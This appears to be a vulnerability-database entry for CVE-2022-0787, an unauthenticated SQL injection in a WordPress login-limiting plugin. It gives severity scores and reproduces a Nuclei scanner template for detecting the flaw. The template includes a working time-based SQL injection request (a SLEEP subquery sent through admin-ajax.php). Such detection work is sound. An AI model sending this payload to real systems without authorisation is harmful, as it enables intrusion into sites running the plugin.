CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
92.5%
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
id: CVE-2022-0787
info:
name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
remediation: Fixed in version 5.1
reference:
- https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
- https://wordpress.org/plugins/wp-limit-failed-login-attempts/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0787
- https://github.com/cyllective/CVEs
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0787
cwe-id: CWE-89
epss-score: 0.04032
epss-percentile: 0.92073
cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: limit_login_attempts_project
product: limit_login_attempts
framework: wordpress
tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project
http:
- raw:
- |
@timeout: 15s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)
matchers:
- type: dsl
dsl:
- duration>=6
- status_code == 200
- contains(header, "text/html")
- contains(body, 'iTotalDisplayRecords')
condition: and
# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
92.5%